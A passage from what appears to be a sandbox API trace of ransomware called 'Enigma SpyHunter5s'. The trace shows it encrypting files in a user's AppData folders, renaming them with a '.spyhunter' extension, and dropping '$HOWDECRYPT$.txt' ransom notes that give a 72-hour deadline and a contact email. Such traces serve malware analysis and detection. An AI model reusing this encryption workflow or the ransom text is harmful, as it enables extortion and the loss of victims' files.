(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.337] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced40*=0x2ac, lpOverlapped=0x0) returned 1 [0156.337] CloseHandle (hObject=0xb0) returned 1 [0156.337] GetProcessHeap () returned 0x2c0000 [0156.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d828 | out: hHeap=0x2c0000) returned 1 [0156.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.338] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.338] WriteFile (in: hFile=0xb0, lpBuffer=0x25cec13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x25cec13*, lpNumberOfBytesWritten=0x25ced3c*=0x127, lpOverlapped=0x0) returned 1 [0156.340] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.340] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced3c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.341] CloseHandle (hObject=0xb0) returned 1 [0156.341] GetProcessHeap () returned 0x2c0000 [0156.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d738 | out: hHeap=0x2c0000) returned 1 [0156.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecd8 | out: pbBuffer=0x25cecd8) returned 1 [0156.341] GetProcessHeap () returned 0x2c0000 [0156.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecd0*=0x30) returned 1 [0156.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0156.342] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".txt") returned 0x0 [0156.342] GetProcessHeap () returned 0x2c0000 [0156.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.342] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec94*=0x2800, lpOverlapped=0x0) returned 1 [0156.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.361] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec94*=0x2800, lpOverlapped=0x0) returned 1 [0156.361] GetProcessHeap () returned 0x2c0000 [0156.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.361] WriteFile (in: hFile=0xb0, lpBuffer=0x25cecd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x25cecd4*, lpNumberOfBytesWritten=0x25cec94*=0x4, lpOverlapped=0x0) returned 1 [0156.362] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec94*=0x30, lpOverlapped=0x0) returned 1 [0156.362] CloseHandle (hObject=0xb0) returned 1 [0156.362] GetProcessHeap () returned 0x2c0000 [0156.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.362] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.spyhunter") returned 86 [0156.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat.spyhunter")) returned 1 [0156.363] GetProcessHeap () returned 0x2c0000 [0156.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.363] GetProcessHeap () returned 0x2c0000 [0156.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.363] GetProcessHeap () returned 0x2c0000 [0156.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef9a0 | out: hHeap=0x2c0000) returned 1 [0156.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecd8 | out: pbBuffer=0x25cecd8) returned 1 [0156.364] GetProcessHeap () returned 0x2c0000 [0156.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecd0*=0x30) returned 1 [0156.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0156.387] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0156.387] GetProcessHeap () returned 0x2c0000 [0156.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.387] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec94*=0x43, lpOverlapped=0x0) returned 1 [0156.388] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.388] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec94*=0x43, lpOverlapped=0x0) returned 1 [0156.388] GetProcessHeap () returned 0x2c0000 [0156.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.388] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.388] WriteFile (in: hFile=0x9c, lpBuffer=0x25cecd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x25cecd4*, lpNumberOfBytesWritten=0x25cec94*=0x4, lpOverlapped=0x0) returned 1 [0156.388] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec94, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec94*=0x30, lpOverlapped=0x0) returned 1 [0156.388] CloseHandle (hObject=0x9c) returned 1 [0156.389] GetProcessHeap () returned 0x2c0000 [0156.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.389] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.spyhunter") returned 100 [0156.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.spyhunter")) returned 1 [0156.389] GetProcessHeap () returned 0x2c0000 [0156.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.390] GetProcessHeap () returned 0x2c0000 [0156.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.390] GetProcessHeap () returned 0x2c0000 [0156.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45428 | out: hHeap=0x2c0000) returned 1 [0156.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecd0 | out: pbBuffer=0x25cecd0) returned 1 [0156.390] GetProcessHeap () returned 0x2c0000 [0156.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecc8*=0x30) returned 1 [0156.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.404] GetProcessHeap () returned 0x2c0000 [0156.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.404] GetProcessHeap () returned 0x2c0000 [0156.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d468 | out: hHeap=0x2c0000) returned 1 [0156.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecd0 | out: pbBuffer=0x25cecd0) returned 1 [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecc8*=0x30) returned 1 [0156.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d288 | out: hHeap=0x2c0000) returned 1 [0156.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecc8 | out: pbBuffer=0x25cecc8) returned 1 [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecc0*=0x30) returned 1 [0156.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.405] GetProcessHeap () returned 0x2c0000 [0156.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cce8 | out: hHeap=0x2c0000) returned 1 [0156.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.406] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.406] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebfb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x25cebfb*, lpNumberOfBytesWritten=0x25ced24*=0x127, lpOverlapped=0x0) returned 1 [0156.407] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.407] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced24*=0x2ac, lpOverlapped=0x0) returned 1 [0156.407] CloseHandle (hObject=0x9c) returned 1 [0156.407] GetProcessHeap () returned 0x2c0000 [0156.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b778 | out: hHeap=0x2c0000) returned 1 [0156.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecc0 | out: pbBuffer=0x25cecc0) returned 1 [0156.408] GetProcessHeap () returned 0x2c0000 [0156.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecb8*=0x30) returned 1 [0156.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0156.415] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0156.415] GetProcessHeap () returned 0x2c0000 [0156.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.415] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec7c*=0x0, lpOverlapped=0x0) returned 1 [0156.415] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.415] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec7c*=0x0, lpOverlapped=0x0) returned 1 [0156.415] GetProcessHeap () returned 0x2c0000 [0156.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.415] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.415] WriteFile (in: hFile=0x9c, lpBuffer=0x25cecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec7c, lpOverlapped=0x0 | out: lpBuffer=0x25cecbc*, lpNumberOfBytesWritten=0x25cec7c*=0x4, lpOverlapped=0x0) returned 1 [0156.416] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec7c*=0x30, lpOverlapped=0x0) returned 1 [0156.416] CloseHandle (hObject=0x9c) returned 1 [0156.416] GetProcessHeap () returned 0x2c0000 [0156.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.416] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].spyhunter") returned 98 [0156.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].spyhunter")) returned 1 [0156.426] GetProcessHeap () returned 0x2c0000 [0156.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.426] GetProcessHeap () returned 0x2c0000 [0156.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.426] GetProcessHeap () returned 0x2c0000 [0156.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45128 | out: hHeap=0x2c0000) returned 1 [0156.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecc0 | out: pbBuffer=0x25cecc0) returned 1 [0156.427] GetProcessHeap () returned 0x2c0000 [0156.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecb8*=0x30) returned 1 [0156.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.427] GetProcessHeap () returned 0x2c0000 [0156.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.427] GetProcessHeap () returned 0x2c0000 [0156.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cfb8 | out: hHeap=0x2c0000) returned 1 [0156.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecb8 | out: pbBuffer=0x25cecb8) returned 1 [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecb0*=0x30) returned 1 [0156.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | 